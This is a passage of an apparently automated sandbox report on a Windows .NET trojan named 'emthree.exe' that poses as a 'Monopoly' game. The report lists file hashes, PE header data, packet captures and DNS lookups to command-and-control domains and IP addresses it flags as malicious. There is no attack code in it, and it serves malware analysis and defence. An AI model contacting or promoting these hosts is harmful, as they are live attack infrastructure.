http://www.tiro.com	explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comm	emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fonts.com	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comu	emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.27.109.19	unknown	United States		18779	EGIHOSTINGUS	true
184.154.50.243	unknown	United States		32475	SINGLEHOP-LLCUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323574
Start date:	27.11.2020
Start time:	06:35:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	emthree.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.8% (good quality ratio 18%) Quality average: 73.7% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 103 Number of non-executed functions: 165
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 51.104.139.180, 2.20.84.85, 52.155.217.156, 20.54.26.129, 40.67.254.36, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 204.79.197.200, 13.107.21.200 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/323574/sample/emthree.exe

Simulations

Behavior and APIs

Time	Type	Description
06:36:09	API Interceptor	15x Sleep call for process: emthree.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SINGLEHOP-LLCUS	document-1514127389.xls	Get hash	malicious	Browse	67.212.179.162
	document-1514127389.xls	Get hash	malicious	Browse	67.212.179.162
	document-1561665791.xls	Get hash	malicious	Browse	67.212.179.162
	document-1597193979.xls	Get hash	malicious	Browse	67.212.179.162
	document-1561665791.xls	Get hash	malicious	Browse	67.212.179.162
	document-1502756172.xls	Get hash	malicious	Browse	67.212.179.162
	document-1502756172.xls	Get hash	malicious	Browse	67.212.179.162
	document-1593420450.xls	Get hash	malicious	Browse	67.212.179.162
	document-1526904949.xls	Get hash	malicious	Browse	67.212.179.162
	document-1593420450.xls	Get hash	malicious	Browse	67.212.179.162
	document-1526904949.xls	Get hash	malicious	Browse	67.212.179.162
	document-1560775643.xls	Get hash	malicious	Browse	67.212.179.162
	document-1560775643.xls	Get hash	malicious	Browse	67.212.179.162
	document-162270445.xls	Get hash	malicious	Browse	67.212.179.162
	document-162270445.xls	Get hash	malicious	Browse	67.212.179.162
	document-1490556011.xls	Get hash	malicious	Browse	67.212.179.162
	document-1490556011.xls	Get hash	malicious	Browse	67.212.179.162
	document-1469700244.xls	Get hash	malicious	Browse	67.212.179.162
	document-1469700244.xls	Get hash	malicious	Browse	67.212.179.162
	document-1511476.xls	Get hash	malicious	Browse	67.212.179.162
EGIHOSTINGUS	PI202009255687.xlsx	Get hash	malicious	Browse	104.164.99.242
	VOMAXTRADING.doc	Get hash	malicious	Browse	50.117.11.156
	inv.exe	Get hash	malicious	Browse	104.164.35.80
	2020112395387_pdf.exe	Get hash	malicious	Browse	104.164.99.242
	EME_PO.39134.xlsx	Get hash	malicious	Browse	104.164.26.233
	new quotation order.exe	Get hash	malicious	Browse	104.252.31.62
	POGWEAP.xlsx	Get hash	malicious	Browse	172.120.44.167
	oqTdpbN5rF.exe	Get hash	malicious	Browse	104.252.192.7
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	104.253.79.71
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	104.164.52.200
	INQUIRY.exe	Get hash	malicious	Browse	45.39.88.85
	Invoice.exe	Get hash	malicious	Browse	45.39.153.189
	new file.exe.exe	Get hash	malicious	Browse	136.0.180.203
	hjKM0s7CWW.exe	Get hash	malicious	Browse	172.121.57.222
	9Ul8m9FQ47.exe	Get hash	malicious	Browse	107.164.194.74
	n4uladudJS.exe	Get hash	malicious	Browse	107.164.194.74
	qkN4OZWFG6.exe	Get hash	malicious	Browse	50.117.84.157
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	50.117.84.157
	NzI1oP5E74.exe	Get hash	malicious	Browse	172.121.57.222
	jtFF5EQoEE.exe	Get hash	malicious	Browse	142.252.135.158

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.log Download File
Process:	C:\Users\user\Desktop\emthree.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	5.345637324625647
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
MD5:	6C42AAF2F2FABAD2BAB70543AE48CEDB
SHA1:	8552031F83C078FE1C035191A32BA43261A63DA9
SHA-256:	51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
SHA-512:	014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.696882160461213
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	emthree.exe
File size:	459776
MD5:	25b5788669a3a8f35596ce975f0823a7
SHA1:	77e07883f131f342e3d24954ea348d25554440a1
SHA256:	f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
SHA512:	53f7273b1d20ec613cb1bcb0c4a30272c90f8585515be013f52be236e9cccc4457b2fab52b9649092807f4de9ab9da21a11d63897c0ed8e9fff02eebefaf1f03
SSDEEP:	12288:YK8UvYOUgUihAbxk6nVTBWOfK/Kl3+XXt8LF:YK8Uv2dbvT0OfKClid8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f................0.............f.... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x471966
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x71914	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x72000	0x594	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x74000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x718f8	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6f96c	0x6fa00	False	0.841486299692	data	7.70662287757	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x72000	0x594	0x600	False	0.415364583333	data	4.06023267139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x74000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x72090	0x304	data
RT_MANIFEST	0x723a4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Monopoly
ProductVersion	1.0.0.0
FileDescription	Monopoly
OriginalFilename	.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 06:37:46.503295898 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:46.628735065 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:46.628865004 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:46.629072905 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:46.754323959 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:47.128029108 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:47.292691946 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.018973112 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019009113 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019030094 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019047976 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019066095 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:48.019074917 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019092083 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:48.019104004 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019130945 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019155025 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019174099 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019191980 CET	80	49746	184.154.50.243	192.168.2.5
Nov 27, 2020 06:37:48.019215107 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:48.019238949 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:48.019243002 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:48.019247055 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:37:48.019258976 CET	49746	80	192.168.2.5	184.154.50.243
Nov 27, 2020 06:38:07.723004103 CET	49747	80	192.168.2.5	23.27.109.19
Nov 27, 2020 06:38:07.894550085 CET	80	49747	23.27.109.19	192.168.2.5
Nov 27, 2020 06:38:07.894740105 CET	49747	80	192.168.2.5	23.27.109.19
Nov 27, 2020 06:38:07.894825935 CET	49747	80	192.168.2.5	23.27.109.19
Nov 27, 2020 06:38:08.068506002 CET	80	49747	23.27.109.19	192.168.2.5
Nov 27, 2020 06:38:08.068561077 CET	80	49747	23.27.109.19	192.168.2.5
Nov 27, 2020 06:38:08.068598032 CET	80	49747	23.27.109.19	192.168.2.5
Nov 27, 2020 06:38:08.068630934 CET	80	49747	23.27.109.19	192.168.2.5
Nov 27, 2020 06:38:08.068656921 CET	80	49747	23.27.109.19	192.168.2.5
Nov 27, 2020 06:38:08.068849087 CET	49747	80	192.168.2.5	23.27.109.19
Nov 27, 2020 06:38:08.068891048 CET	49747	80	192.168.2.5	23.27.109.19
Nov 27, 2020 06:38:08.068949938 CET	49747	80	192.168.2.5	23.27.109.19
Nov 27, 2020 06:38:08.068964958 CET	49747	80	192.168.2.5	23.27.109.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 06:35:59.423458099 CET	54757	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:35:59.450866938 CET	53	54757	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:00.254846096 CET	49992	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:00.282181025 CET	53	49992	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:22.684704065 CET	60075	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:22.711971998 CET	53	60075	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:23.952682018 CET	55016	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:23.997966051 CET	53	55016	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:44.839894056 CET	64345	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:44.875737906 CET	53	64345	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:45.319561005 CET	57128	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:45.355184078 CET	53	57128	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:45.782104969 CET	54791	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:45.809331894 CET	53	54791	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:46.375197887 CET	50463	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:46.410703897 CET	53	50463	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:46.524899006 CET	50394	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:46.562680960 CET	53	50394	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:46.857793093 CET	58530	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:46.893222094 CET	53	58530	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:47.262835979 CET	53813	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:47.298357010 CET	53	53813	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:47.721534014 CET	63732	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:47.759166002 CET	53	63732	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:48.233823061 CET	57344	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:48.270900011 CET	53	57344	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:48.312632084 CET	54450	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:48.349679947 CET	53	54450	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:48.373967886 CET	59261	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:48.409102917 CET	53	59261	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:49.397313118 CET	57151	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:49.432845116 CET	53	57151	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:49.880383968 CET	59413	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:49.907641888 CET	53	59413	8.8.8.8	192.168.2.5
Nov 27, 2020 06:36:53.477510929 CET	60516	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:36:53.519870996 CET	53	60516	8.8.8.8	192.168.2.5
Nov 27, 2020 06:37:04.756514072 CET	51649	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:37:05.704509974 CET	53	51649	8.8.8.8	192.168.2.5
Nov 27, 2020 06:37:22.738609076 CET	65086	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:37:22.765702009 CET	53	65086	8.8.8.8	192.168.2.5
Nov 27, 2020 06:37:23.996509075 CET	56432	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:37:24.023689032 CET	53	56432	8.8.8.8	192.168.2.5
Nov 27, 2020 06:37:25.893688917 CET	52929	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:37:25.942146063 CET	53	52929	8.8.8.8	192.168.2.5
Nov 27, 2020 06:37:26.103823900 CET	64317	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:37:26.162023067 CET	53	64317	8.8.8.8	192.168.2.5
Nov 27, 2020 06:37:46.346628904 CET	61004	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:37:46.497160912 CET	53	61004	8.8.8.8	192.168.2.5
Nov 27, 2020 06:38:07.318126917 CET	56895	53	192.168.2.5	8.8.8.8
Nov 27, 2020 06:38:07.721736908 CET	53	56895	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 27, 2020 06:37:04.756514072 CET	192.168.2.5	8.8.8.8	0x7fe5	Standard query (0)	www.asojebu.com	A (IP address)	IN (0x0001)
Nov 27, 2020 06:37:26.103823900 CET	192.168.2.5	8.8.8.8	0x74c	Standard query (0)	www.haircuressteampod.com	A (IP address)	IN (0x0001)
Nov 27, 2020 06:37:46.346628904 CET	192.168.2.5	8.8.8.8	0xe6ba	Standard query (0)	www.porncamslivechat.com	A (IP address)	IN (0x0001)
Nov 27, 2020 06:38:07.318126917 CET	192.168.2.5	8.8.8.8	0x5dad	Standard query (0)	www.amarilloautoexpress.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 27, 2020 06:37:05.704509974 CET	8.8.8.8	192.168.2.5	0x7fe5	Name error (3)	www.asojebu.com	none	none	A (IP address)	IN (0x0001)
Nov 27, 2020 06:37:26.162023067 CET	8.8.8.8	192.168.2.5	0x74c	Name error (3)	www.haircuressteampod.com	none	none	A (IP address)	IN (0x0001)
Nov 27, 2020 06:37:46.497160912 CET	8.8.8.8	192.168.2.5	0xe6ba	No error (0)	www.porncamslivechat.com	porncamslivechat.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 06:37:46.497160912 CET	8.8.8.8	192.168.2.5	0xe6ba	No error (0)	porncamslivechat.com		184.154.50.243	A (IP address)	IN (0x0001)
Nov 27, 2020 06:38:07.721736908 CET	8.8.8.8	192.168.2.5	0x5dad	No error (0)	www.amarilloautoexpress.com		23.27.109.19	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.porncamslivechat.com

www.amarilloautoexpress.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
